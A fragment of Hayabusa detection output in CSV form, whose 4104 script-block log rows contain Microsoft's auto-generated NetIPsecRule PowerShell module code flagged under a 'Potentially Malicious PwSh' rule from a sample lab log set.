$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 